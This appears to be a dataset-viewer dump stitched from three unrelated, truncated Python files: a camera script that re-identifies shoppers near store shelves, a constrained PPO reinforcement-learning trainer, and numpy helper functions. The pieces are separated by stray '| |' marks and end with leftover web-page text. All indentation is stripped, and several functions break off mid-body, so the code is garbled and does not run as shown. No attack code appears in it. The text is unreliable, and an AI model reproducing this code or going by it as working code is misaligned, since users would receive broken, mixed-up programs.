<reponame>lusindazc/det_reid<filename>multi_people/runcam11_goods_connected_multi-1217.py
#me : 2018-11-27
# @Author : <NAME>,<NAME>
# @Description : Give an interface to one cam
# @last_modification: 2018-12-10
#---------------------------------
import HKIPcamera
import cv2
from loadconfig import *
import rospy # Bingoren
from sensor_msgs.msg import CompressedImage #Bingo
from cv_bridge import CvBridge, CvBridgeError #Bingo
from utils import *
from darknet import Darknet
import os.path as osp
from reid.utils.serialization import load_checkpoint
from reid import models
from reid.feature_extraction import extract_cnn_feature
import publish_msg.publish_msg as pubmsg
import pickle
import torchvision.transforms as T
class_names = None
def compare_dic(dic1,dic2):
for i in (dic1):
for j in (dic2):
if i==j and dic1[i] != dic2[j]:
return True
return False
def exist_people(dic1):
for i in (dic1):
if dic1[i] == 1:
return True
return False
def diff_dic(dic2,dic1):
diff = []
for i in (dic1):
for j in (dic2):
if i==j and dic1[i]!= dic2[j]:
diff.append(i)
if not dic2.has_key(i):
diff.append(i)
return diff
def pairwise_distance(fea1, fea2):
fea1 = torch.squeeze(fea1,0)
fea1 = torch.squeeze(fea1,-1)
fea2 = torch.squeeze(fea2,0)
fea2 = torch.squeeze(fea2,-1)
x = fea1
y = fea2
m1,n=1,1
x = x.view(m1, -1)
y = y.view(n, -1)
dist = torch.pow(x, 2).sum(1).unsqueeze(1).expand(m1, n) + \
torch.pow(y, 2).sum(1).unsqueeze(1).expand(n, m1).t()
dist.addmm_(1, -2, x, y.t())
return torch.sum(dist)
def jieduan(img,left,top,right,bottom):
imgg=np.zeros((bottom-top,right-left,3))
imgg = img[top:bottom, left:right, :]
return imgg
def calcIOU(p_x, p_y, p_bx, p_by, c_x, c_y, c_bx, c_by):
zh = c_x
c_x = c_bx#960 - c_x
c_bx = zh#960 - c_bx
condition1 = p_x >= c_x and p_x <= c_bx
condition2 = p_bx >= c_x and p_bx <= c_bx
condition3 = p_y >= c_y and p_y <= c_by
condition4 = p_by >= c_y and p_by <= c_by
#print p_x, p_y, p_bx, p_by, c_x, c_y, c_bx, c_by
if (condition1 and condition3) or (condition1 and condition4) or \
(condition2 and condition3) or (condition2 and condition4):
calcIOU = 1
else:
calcIOU = -1
return calcIOU
def calcIOU_old(one_x, one_y, one_w, one_h, two_x, two_y, two_w, two_h):
#one_x = 960-one_x
#one_w = 960-one_w
#zh=two_x
#two_x = two_m
#two_m = zh
#print one_x,one_m,two_x,two_m
#print one_y,one_n,two_y,two_n
#one_w = abs(one_x - one_m)
#one_h = abs(one_y - one_n)
#two_w = abs(two_x - two_m)
#two_h = abs(two_y - two_n)
#print one_w,one_h,two_w,two_h
if ((abs(one_x - two_x) < ((one_w + two_w) / 2.0)) and (abs(one_y - two_y) < ((one_h + two_h) / 2.0))):
lu_x_inter = max((one_x - (one_w / 2.0)), (two_x - (two_w / 2.0)))
lu_y_inter = min((one_y + (one_h / 2.0)), (two_y + (two_h / 2.0)))
rd_x_inter = min((one_x + (one_w / 2.0)), (two_x + (two_w / 2.0)))
rd_y_inter = max((one_y - (one_h / 2.0)), (two_y - (two_h / 2.0)))
inter_w = abs(rd_x_inter - lu_x_inter)
inter_h = abs(lu_y_inter - rd_y_inter)
inter_square = inter_w * inter_h
union_square = (one_w * one_h) + (two_w * two_h) - inter_square
#calcIOU = inter_square / union_square * 1.0
print two_w,two_h
calcIOU = inter_square / (abs(two_y-two_h)*abs(two_x-two_w))
print("calcIOU:", calcIOU)
else:
# print("No interse ction!")
calcIOU = -1
return calcIOU
def newcalcIOU(two_x, two_y, two_w, two_h,one_x, one_y, one_w,one_h ):
zh = one_x
one_x = one_w#960-one_x
one_w = zh#960-one_w
S_rec1 = (one_w- one_x) * (one_h - one_y)
S_rec2 = (two_w - two_x) * (two_h - two_y)
sum_area = S_rec1 + S_rec2
left_line = max(one_x, two_x)
right_line = min(one_w, two_w)
top_line = max(one_y, two_y)
bottom_line = min(one_h, two_h)
# judge if there is an intersect
if left_line >= right_line or top_line >= bottom_line:
return -1
else:
intersect = (right_line - left_line) * (bottom_line - top_line)
#print intersect, S_rec2
iou = float(intersect) / S_rec2
#print("IOU:",iou)
return iou
def coordinate_IOU(two_x, two_y, two_w, two_h,one_x, one_y, one_w,one_h): # compute the coordinate of the IOU area
zh =one_x
one_x = one_w#960-one_x
one_w = zh#960-one_w
left_line = max(one_x, two_x)
right_line = min(one_w, two_w)
top_line = max(one_y, two_y)
bottom_line = min(one_h, two_h)
return left_line, top_line, right_line, bottom_line
# person detection and reid
def preprocess(img):
img = cv2.resize(img, (128,256))
img = test_transformer(img)
img = torch.unsqueeze(img, 0)
#print(img.shape)
return img
def reid_draw(frame, b_b, model, cfg):
global size
id_name = 'new'
cfg.cuda()
left=int((b_b[0] - b_b[2]/2.0) * size[0])
top=int((b_b[1]- b_b[3]/2.0) * size[1])
right=int((b_b[0] + b_b[2]/2.0) * size[0])
bottom=int((b_b[1] + b_b[3]/2.0) * size[1])
#print left,top,right,bottom
if left<0 or right< 0 or top <0 or bottom <0:
return left, top, right, bottom, id_name
img1 = jieduan(frame,left,top,right,bottom)
img = preprocess(img1)
feature = extract_cnn_feature(model, img.cuda())
minsim = -1
rentidir = '/home/tujh/renti/'
pkl_file = open('/data/reid/renti/data.pkl', 'rb')
shujuku = pickle.load(pkl_file)
#for feature2,filename in shujuku:
for query in shujuku:
for fea in shujuku[query]:
distan = pairwise_distance(feature,fea)
if minsim > distan or minsim == -1:
minsim = distan
id_name = int(query)
cv2.rectangle(frame, (left, top), (right, bottom), (255, 0, 0), 2)
cv2.putText(frame, str(id_name), (left,top), cv2.FONT_HERSHEY_COMPLEX, 6, (255,0,0),2)
# draw shangpin area
left_x, top_y, right_m, bottom_n = shangpin_area()
cv2.rectangle(frame, (left_x, top_y), (right_m, bottom_n), (0, 255, 0), 2)
left_x_2, top_y_2, right_m_2, bottom_n_2 = shangpin_area_huojia2()
cv2.rectangle(frame, (left_x_2, top_y_2), (right_m_2, bottom_n_2), (255, 0, 0), 2)
#print(left, top, right, bottom)
return left,top,right,bottom,id_name
normalizer = T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
test_transformer = T.Compose([T.ToTensor(),
normalizer,
])
#the area of shangpin
def shangpin_area():
#detect_region = config.config['CameraConfig']['camera_7']['detect_region'] #11/17
#left_x = detect_region[0]
#top_y = detect_region[1] - 80
#right_m = detect_region[2]
#bottom_n = detect_region[3] + 60
#left_x = 610
#top_y = 31
#right_m = 350
#bottom_n = 369
#left_x = 678
#top_y = 4
#right_m = 300
#bottom_n = 330
left_x = 570
top_y = 3
right_m = 451
bottom_n = 231
return left_x,top_y,right_m,bottom_n
def shangpin_area_huojia2():
#detect_region = config.config['CameraConfig']['camera_7']['detect_region'] #11/17
#left_x = detect_region[0]
#top_y = detect_region[1] - 80
#right_m = detect_region[2]
#bottom_n = detect_region[3] + 60
#left_x = 910
#top_y = 31
#right_m = 350
#bottom_n = 369
#left_x = 1100
#top_y = 30
#right_m = 673
#bottom_n = 400
left_x = 410
top_y = 49
right_m = 182
bottom_n = 235
return left_x,top_y,right_m,bottom_n
#initial the flag of all the people we detected
def initial_flag(left,top,right,bottom):
left_x,top_y,right_m,bottom_n = shangpin_area()
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
#calcIOU1 = calcIOU_old(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
#print(calcIOU1)
if calcIOU1 > 0.5:
flag = 1
else:
flag = 0
return flag
def initial_flag_out(left,top,right,bottom):
left_x,top_y,right_m,bottom_n = shangpin_area()
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
if calcIOU1 > 0:
flag = 1
else:
flag = 0
return flag
def initial_flag_huojia2(left,top,right,bottom):
left_x,top_y,right_m,bottom_n = shangpin_area_huojia2()
#print('huojia2_initial')
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
if calcIOU1 > 0.5:
flag = 1
else:
flag = 0
return flag
def initial_flag_out_huojia2(left,top,right,bottom):
left_x,top_y,right_m,bottom_n = shangpin_area_huojia2()
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
if calcIOU1 > 0:
flag = 1
else:
flag = 0
return flag
def xuanze_original(res, frame, model, cfg, threadPubMsg, camera_id, dic_change, dic_change_huojia2, huojia1_id, huojia2_id):
dic = {}
#left_x, top_y, right_m, bottom_n = shangpin_area()
#cv2.rectangle(frame, (left_x, top_y), (right_m, bottom_n), (0, 255, 0), 2)
dic_huojia2 = {}
#left_x_2, top_y_2, right_m_2, bottom_n_2 = shangpin_area_huojia2()
#cv2.rectangle(frame, (left_x_2, top_y_2), (right_m_2, bottom_n_2), (0, 255, 0), 2)
if len(res) == 1:
result = res[0]
left,top,right,bottom,id_name = reid_draw(frame, result, model, cfg)
if dic_change.has_key(id_name):
if dic_change[id_name] == 1:
flag = initial_flag_out(left,top,right,bottom)
else:
flag = initial_flag(left,top,right,bottom)
else:
flag = initial_flag(left, top,right,bottom)
dic[id_name] = flag
if dic_change_huojia2.has_key(id_name):
if dic_change_huojia2[id_name] == 1:
flag = initial_flag_out_huojia2(left,top,right,bottom)
else:
flag = initial_flag_huojia2(left,top,right,bottom)
else:
flag = initial_flag_huojia2(left, top,right,bottom)
dic_huojia2[id_name] = flag
elif len(res) > 1:
for item in res:
result = item
if (len(result) > 0):
left,top,right,bottom,id_name = reid_draw(frame, result, model, cfg)
if dic_change.has_key(id_name):
if dic_change[id_name] == 1:
flag = initial_flag_out(left,top,right,bottom)
else:
flag = initial_flag(left,top,right,bottom)
else:
flag = initial_flag(left, top,right,bottom)
dic[id_name] = flag
if dic_change_huojia2.has_key(id_name):
if dic_change_huojia2[id_name] == 1:
flag = initial_flag_out_huojia2(left,top,right,bottom)
else:
flag = initial_flag_huojia2(left,top,right,bottom)
else:
flag = initial_flag_huojia2(left, top,right,bottom)
dic_huojia2[id_name] = flag
return dic,dic_huojia2
def people_list(res):
peolist = []
left_x,top_y,right_m,bottom_n = shangpin_area()
for b_b in res:
global size
left=int((b_b[0] - b_b[2]/2.0) * size[0])
top=int((b_b[1]- b_b[3]/2.0) * size[1])
right=int((b_b[0] + b_b[2]/2.0) * size[0])
bottom=int((b_b[1] + b_b[3]/2.0) * size[1])
if calcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)>0:
x1,x2,x3,x4 = coordinate_IOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
peolist.append(x1)
peolist.append(x2)
peolist.append(x3)
peolist.append(x4)
return peolist
#choose the one which is next to the area of shangpin
def xuanze(res, frame, model, cfg, threadPubMsg, camera_id, dic, change_dic, dic_huojia2, change_dic_huojia2, huojia1_id, huojia2_id):
for item in res:
result = item
# add new person
if (len(result) > 0):
left, top, right, bottom, id_name = reid_draw(frame, result, model, cfg)
| |
import numpy as np
import torch
from torch.optim import Adam
import gym
import time
import yaml
import safe_rl.algos.cppo.core as core
from safe_rl.utils.logx import EpochLogger
from safe_rl.utils.mpi_pytorch import setup_pytorch_for_mpi, sync_params, mpi_avg_grads
from safe_rl.utils.mpi_tools import (mpi_fork, mpi_avg, proc_id, mpi_statistics_scalar,
num_procs, mpi_sum)
from extra_envs.wrappers import Intervention
from extra_envs.intervener.base import Intervener
class CPPOBuffer:
"""
A buffer for storing trajectories experienced by a PPO agent interacting
with the environment, and using Generalized Advantage Estimation (GAE-Lambda)
for calculating the advantages of state-action pairs.
"""
def __init__(self, obs_dim, act_dim, size, gamma=0.99, lam=0.95, scaling=1.,
normalize_adv=False):
self.obs_buf = np.zeros(core.combined_shape(size, obs_dim), dtype=np.float32)
self.act_buf = np.zeros(core.combined_shape(size, act_dim), dtype=np.float32)
# Associated with task reward
self.adv_buf = np.zeros(size, dtype=np.float32)
self.rew_buf = np.zeros(size, dtype=np.float32)
self.ret_buf = np.zeros(size, dtype=np.float32)
self.val_buf = np.zeros(size, dtype=np.float32)
# Associated with task cost
self.cadv_buf = np.zeros(size, dtype=np.float32)
self.cost_buf = np.zeros(size, dtype=np.float32)
self.cret_buf = np.zeros(size, dtype=np.float32)
self.cval_buf = np.zeros(size, dtype=np.float32)
self.intv_buf = np.zeros(size, dtype=np.bool)
self.logp_buf = np.zeros(size, dtype=np.float32)
self.normalize_adv = normalize_adv
self.gamma, self.lam, self.scaling = gamma, lam, scaling
self.ptr, self.path_start_idx, self.max_size = 0, 0, size
def store(self, obs, act, rew, val, cost, cval, intv, logp):
"""
Append one timestep of agent-environment interaction to the buffer.
"""
assert self.ptr < self.max_size # buffer has to have room so you can store
self.obs_buf[self.ptr] = obs
self.act_buf[self.ptr] = act
# Reward
self.rew_buf[self.ptr] = self.scaling*rew
self.val_buf[self.ptr] = val
# Cost
self.cost_buf[self.ptr] = self.scaling*cost
self.cval_buf[self.ptr] = cval
self.intv_buf[self.ptr] = intv
self.logp_buf[self.ptr] = logp
self.ptr += 1
def finish_path(self, last_val=0, last_cval=0):
"""
Call this at the end of a trajectory, or when one gets cut off
by an epoch ending. This looks back in the buffer to where the
trajectory started, and uses rewards and value estimates from
the whole trajectory to compute advantage estimates with GAE-Lambda,
as well as compute the rewards-to-go for each state, to use as
the targets for the value function.
The "last_val" argument should be 0 if the trajectory ended
because the agent reached a terminal state (died), and otherwise
should be V(s_T), the value function estimated for the last state.
This allows us to bootstrap the reward-to-go calculation to account
for timesteps beyond the arbitrary episode horizon (or epoch cutoff).
"""
path_slice = slice(self.path_start_idx, self.ptr)
###########
# Rewards #
###########
rews = np.append((1-self.gamma)*self.rew_buf[path_slice], last_val)
vals = np.append(self.val_buf[path_slice], last_val)
# the next two lines implement GAE-Lambda advantage calculation
deltas = rews[:-1] + self.gamma * vals[1:] - vals[:-1]
self.adv_buf[path_slice] = core.discount_cumsum(deltas, self.gamma * self.lam)
# the next line computes rewards-to-go, to be targets for the value function
self.ret_buf[path_slice] = core.discount_cumsum(rews, self.gamma)[:-1]
#########
# Costs #
#########
costs = np.append((1-self.gamma)*self.cost_buf[path_slice], last_cval)
cvals = np.append(self.cval_buf[path_slice], last_cval)
cdeltas = costs[:-1] + self.gamma*cvals[1:] - cvals[:-1]
self.cadv_buf[path_slice] = core.discount_cumsum(cdeltas, self.gamma*self.lam)
self.cret_buf[path_slice] = core.discount_cumsum(costs, self.gamma)[:-1]
self.path_start_idx = self.ptr
def get(self, log_penalty=-np.infty):
"""
Call this at the end of an epoch to get all of the data from
the buffer, with advantages appropriately normalized (shifted to have
mean zero and std one). Also, resets some pointers in the buffer.
"""
assert self.ptr == self.max_size # buffer has to be full before you can get
self.ptr, self.path_start_idx = 0, 0
# the next two lines implement the advantage normalization trick
weight = 1/(1 + np.exp(-log_penalty))
lagrange_adv_buf = (1-weight)*self.adv_buf - weight*self.cadv_buf
adv_mean, adv_std = mpi_statistics_scalar(lagrange_adv_buf)
lagrange_adv_buf = lagrange_adv_buf - adv_mean
lagrange_adv_buf /= (adv_std if self.normalize_adv else self.scaling)
data = dict(obs=self.obs_buf, act=self.act_buf, ret=self.ret_buf,
cret=self.cret_buf, adv=lagrange_adv_buf, logp=self.logp_buf)
out = {k: torch.as_tensor(v, dtype=torch.float32) for k,v in data.items()}
out.update(intv=self.intv_buf)
return out
def cppo(env_fn, actor_critic=core.MLPActorCritic, ac_kwargs=dict(), seed=0,
steps_per_epoch=4000, epochs=50, gamma=0.99, clip_ratio=0.2, pi_lr=3e-4,
vf_lr=1e-3, train_pi_iters=80, train_v_iters=80, lam=0.97, max_ep_len=1000,
target_kl=0.01, logger_kwargs=dict(), save_freq=10,
num_test_episodes=10, ent_bonus=0.001, scaling=100., dont_normalize_adv=False,
# Cost constraint/penalties
cost_lim=0.01, penalty=1., penalty_lr=5e-2, update_penalty_every=1,
optimize_penalty=False, ignore_unsafe_cost=False
):
"""
Proximal Policy Optimization (by clipping),
with early stopping based on approximate KL
Args:
env_fn : A function which creates a copy of the environment.
The environment must satisfy the OpenAI Gym API.
actor_critic: The constructor method for a PyTorch Module with a
``step`` method, an ``act`` method, a ``pi`` module, and a ``v``
module. The ``step`` method should accept a batch of observations
and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``a`` (batch, act_dim) | Numpy array of actions for each
| observation.
``v`` (batch,) | Numpy array of value estimates
| for the provided observations.
``logp_a`` (batch,) | Numpy array of log probs for the
| actions in ``a``.
=========== ================ ======================================
The ``act`` method behaves the same as ``step`` but only returns ``a``.
The ``pi`` module's forward call should accept a batch of
observations and optionally a batch of actions, and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``pi`` N/A | Torch Distribution object, containing
| a batch of distributions describing
| the policy for the provided observations.
``logp_a`` (batch,) | Optional (only returned if batch of
| actions is given). Tensor containing
| the log probability, according to
| the policy, of the provided actions.
| If actions not given, will contain
| ``None``.
=========== ================ ======================================
The ``v`` module's forward call should accept a batch of observations
and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``v`` (batch,) | Tensor containing the value estimates
| for the provided observations. (Critical:
| make sure to flatten this!)
=========== ================ ======================================
ac_kwargs (dict): Any kwargs appropriate for the ActorCritic object
you provided to PPO.
seed (int): Seed for random number generators.
steps_per_epoch (int): Number of steps of interaction (state-action pairs)
for the agent and the environment in each epoch.
epochs (int): Number of epochs of interaction (equivalent to
number of policy updates) to perform.
gamma (float): Discount factor. (Always between 0 and 1.)
clip_ratio (float): Hyperparameter for clipping in the policy objective.
Roughly: how far can the new policy go from the old policy while
still profiting (improving the objective function)? The new policy
can still go farther than the clip_ratio says, but it doesn't help
on the objective anymore. (Usually small, 0.1 to 0.3.) Typically
denoted by :math:`\epsilon`.
pi_lr (float): Learning rate for policy optimizer.
vf_lr (float): Learning rate for value function optimizer.
train_pi_iters (int): Maximum number of gradient descent steps to take
on policy loss per epoch. (Early stopping may cause optimizer
to take fewer than this.)
train_v_iters (int): Number of gradient descent steps to take on
value function per epoch.
lam (float): Lambda for GAE-Lambda. (Always between 0 and 1,
close to 1.)
max_ep_len (int): Maximum length of trajectory / episode / rollout.
target_kl (float): Roughly what KL divergence we think is appropriate
between new and old policies after an update. This will get used
for early stopping. (Usually small, 0.01 or 0.05.)
logger_kwargs (dict): Keyword args for EpochLogger.
save_freq (int): How often (in terms of gap between epochs) to save
the current policy and value function.
scaling (float): How much to scale the empirical returns to aid in learning the
value function
cost_lim (float): The tolerated cost limit
penalty (float): The initial penalty value
penalty_lr (float): The update size for the penalty
update_penalty_every (int): After how many policy updates we update the penalty
optimize_penalty (bool): Whether to optimize the penalty or keep it fixed
ignore_unsafe_cost (bool): Whether to consider the unsafe cost when computing the
cost.
"""
# Special function to avoid certain slowdowns from PyTorch + MPI combo.
setup_pytorch_for_mpi()
# Set up logger and save configuration
logger = EpochLogger(**logger_kwargs)
logger.save_config(locals())
# Random seed
seed += 10000 * proc_id()
torch.manual_seed(seed)
np.random.seed(seed)
# Instantiate environment
env = env_fn()
test_env = env.env
#test_env = gym.make('extra_envs:HalfCheetah-v0')
obs_dim = env.observation_space.shape
act_dim = env.action_space.shape
rew_range = env.reward_range
v_range = (scaling*rew_range[0], scaling*rew_range[1])
vc_range = (0, scaling*1)
max_ep_len = min(max_ep_len, env.env._max_episode_steps)
# Create actor-critic module
ac = actor_critic(env.observation_space, env.action_space, v_range=v_range,
vc_range=vc_range, pred_std=True, **ac_kwargs)
# Sync params across processes
sync_params(ac)
# Count variables
var_counts = tuple(core.count_vars(module) for module in [ac.pi, ac.v])
logger.log('\nNumber of parameters: \t pi: %d, \t v: %d\n' % var_counts)
# Set up experience buffer
local_steps_per_epoch = int(steps_per_epoch / num_procs())
buf = CPPOBuffer(obs_dim, act_dim, local_steps_per_epoch, gamma, lam, | |
d in range(len(a.shape))])
if no_value:
code += indent + 'yield ' + index
else:
code += indent + 'yield ' + 'a[%s]' % index + ', (' + index + ')'
exec code
return nested_loops, code
def compute_histogram(samples, nbins=50, piecewise_constant=True):
"""
Given a numpy array samples with random samples, this function
returns the (x,y) arrays in a plot-ready version of the histogram.
If piecewise_constant is True, the (x,y) arrays gives a piecewise
constant curve when plotted, otherwise the (x,y) arrays gives a
piecewise linear curve where the x coordinates coincide with the
center points in each bin. The function makes use of
numpy.lib.function_base.histogram with some additional code
(for a piecewise curve or displaced x values to the centes of
the bins).
"""
import sys
if 'numpy' in sys.modules:
y0, bin_edges = histogram(samples, bins=nbins, normed=True)
h = bin_edges[1] - bin_edges[0] # bin width
if piecewise_constant:
x = zeros(2*len(bin_edges), type(bin_edges[0]))
y = x.copy()
x[0] = bin_edges[0]
y[0] = 0
for i in range(len(bin_edges)-1):
x[2*i+1] = bin_edges[i]
x[2*i+2] = bin_edges[i+1]
y[2*i+1] = y0[i]
y[2*i+2] = y0[i]
x[-1] = bin_edges[-1]
y[-1] = 0
else:
x = zeros(len(bin_edges)-1, type(bin_edges[0]))
y = y0.copy()
for i in range(len(x)):
x[i] = (bin_edges[i] + bin_edges[i+1])/2.0
return x, y
def factorial(n, method='reduce'):
"""
Compute the factorial n! using long integers (and pure Python code).
Different implementations are available (see source code for
implementation details).
Note: The math module in Python 2.6 features a factorial
function, making the present function redundant (except that
the various pure Python implementations can be of interest
for comparison).
Here is an efficiency comparison of the methods (computing 80!):
========================== =====================
Method Normalized CPU time
========================== =====================
reduce 1.00
lambda list comprehension 1.70
lambda functional 3.08
plain recursive 5.83
lambda recursive 21.73
scipy 131.18
========================== =====================
"""
if not isinstance(n, (int, long, float)):
raise TypeError('factorial(n): n must be integer not %s' % type(n))
n = long(n)
if n == 0 or n == 1:
return 1
if method == 'plain iterative':
f = 1
for i in range(1, n+1):
f *= i
return f
elif method == 'plain recursive':
if n == 1:
return 1
else:
return n*factorial(n-1, method)
elif method == 'lambda recursive':
fc = lambda n: n and fc(n-1)*long(n) or 1
return fc(n)
elif method == 'lambda functional':
fc = lambda n: n<=0 or \
reduce(lambda a,b: long(a)*long(b), xrange(1,n+1))
return fc(n)
elif method == 'lambda list comprehension':
fc = lambda n: [j for j in [1] for i in range(2,n+1) \
for j in [j*i]] [-1]
return fc(n)
elif method == 'reduce':
return reduce(operator.mul, xrange(2, n+1))
elif method == 'scipy':
try:
import scipy.misc.common as sc
return sc.factorial(n)
except ImportError:
print 'numpyutils.factorial: scipy is not available'
print 'default method="reduce" is used instead'
return reduce(operator.mul, xrange(2, n+1))
# or return factorial(n)
else:
raise ValueError('factorial: method="%s" is not supported' % method)
def asarray_cpwarn(a, dtype=None, message='warning', comment=''):
"""
As asarray, but a warning or exception is issued if the
a array is copied.
"""
a_new = asarray(a, dtype)
# must drop numpy's order argument since it conflicts
# with Numeric's savespace
# did we copy?
if a_new is not a:
# we do not return the identical array, i.e., copy has taken place
msg = '%s copy of array %s, from %s to %s' % \
(comment, a.shape, type(a), type(a_new))
if message == 'warning':
print 'Warning: %s' % msg
elif message == 'exception':
raise TypeError(msg)
return a_new
def seq(min=0.0, max=None, inc=1.0, type=float,
return_type='NumPyArray'):
"""
Generate numbers from min to (and including!) max,
with increment of inc. Safe alternative to arange.
The return_type string governs the type of the returned
sequence of numbers ('NumPyArray', 'list', or 'tuple').
"""
if max is None: # allow sequence(3) to be 0., 1., 2., 3.
# take 1st arg as max, min as 0, and inc=1
max = min; min = 0.0; inc = 1.0
r = arange(min, max + inc/2.0, inc, type)
if return_type == 'NumPyArray' or return_type == ndarray:
return r
elif return_type == 'list':
return r.tolist()
elif return_type == 'tuple':
return tuple(r.tolist())
def iseq(start=0, stop=None, inc=1):
"""
Generate integers from start to (and including) stop,
with increment of inc. Alternative to range/xrange.
"""
if stop is None: # allow isequence(3) to be 0, 1, 2, 3
# take 1st arg as stop, start as 0, and inc=1
stop = start; start = 0; inc = 1
return xrange(start, stop+inc, inc)
sequence = seq # backward compatibility
isequence = iseq # backward compatibility
def arr(shape=None, element_type=float,
interval=None,
data=None, copy=True,
file_=None,
order='C'):
"""
Compact and flexible interface for creating numpy arrays,
including several consistency and error checks.
- *shape*: length of each dimension, tuple or int
- *data*: list, tuple, or numpy array with data elements
- *copy*: copy data if true, share data if false, boolean
- *element_type*: float, int, int16, float64, bool, etc.
- *interval*: make elements from a to b (shape gives no of elms), tuple or list
- *file_*: filename or file object containing array data, string
- *order*: 'Fortran' or 'C' storage, string
- return value: created Numerical Python array
The array can be created in four ways:
1. as zeros (just shape specified),
2. as uniformly spaced coordinates in an interval [a,b]
3. as a copy of or reference to (depending on copy=True,False resp.)
a list, tuple, or numpy array (provided as the data argument),
4. from data in a file (for one- or two-dimensional real-valued arrays).
The function calls the underlying numpy functions zeros, array and
linspace (see the numpy manual for the functionality of these
functions). In case of data in a file, the first line determines
the number of columns in the array. The file format is just rows
and columns with numbers, no decorations (square brackets, commas,
etc.) are allowed.
>>> arr((3,4))
array([[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.]])
>>> arr(4, element_type=int) + 4 # integer array
array([4, 4, 4, 4])
>>> arr(3, interval=[0,2])
array([ 0., 1., 2.])
>>> somelist=[[0,1],[5,5]]
>>> a = arr(data=somelist)
>>> a # a has always float elements by default
array([[ 0., 1.],
[ 5., 5.]])
>>> a = arr(data=somelist, element_type=int)
>>> a
array([[0, 1],
[5, 5]])
>>> b = a + 1
>>> c = arr(data=b, copy=False) # let c share data with b
>>> b is c
True
>>> id(b) == id(c)
True
>>> # make a file with array data:
>>> f = open('tmp.dat', 'w')
>>> f.write('''\
... 1 3
... 2 6
... 3 12
... 3.5 20
... ''')
>>> f.close()
>>> # read array data from file:
>>> a = arr(file_='tmp.dat')
>>> a
array([[ 1. , 3. ],
[ 2. , 6. ],
[ 3. , 12. ],
[ 3.5, 20. ]])
"""
if data is None and file_ is None and shape is None:
return None
if data is not None:
if not operator.isSequenceType(data):
raise TypeError('arr: data argument is not a sequence type')
if isinstance(shape, (list,tuple)):
# check that shape and data are compatible:
if reduce(operator.mul, shape) != size(data):
raise ValueError(
'arr: shape=%s is not compatible with %d '\
'elements in the provided data' % (shape, size(data)))
elif isinstance(shape, int):
if shape != size(data):
raise ValueError(
'arr: shape=%d is not compatible with %d '\
'elements in the provided data' % (shape, size(data)))
elif shape is None:
if isinstance(data, (list,tuple)) and copy == False:
# cannot share data (data is list/tuple)
copy = True
return array(data, dtype=element_type, copy=copy, order=order)
else:
raise TypeError(
'shape is %s, must be list/tuple or int' % type(shape))
elif file_ is not None:
if not isinstance(file_, (basestring, file, StringIO)):
raise TypeError(
'file_ argument must be a string (filename) or '\
'open file object, not %s' % type(file_))
if isinstance(file_, basestring):
file_ = open(file_, 'r')
# skip blank lines:
while True:
line1 = file_.readline().strip()
if line1 != '':
break
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.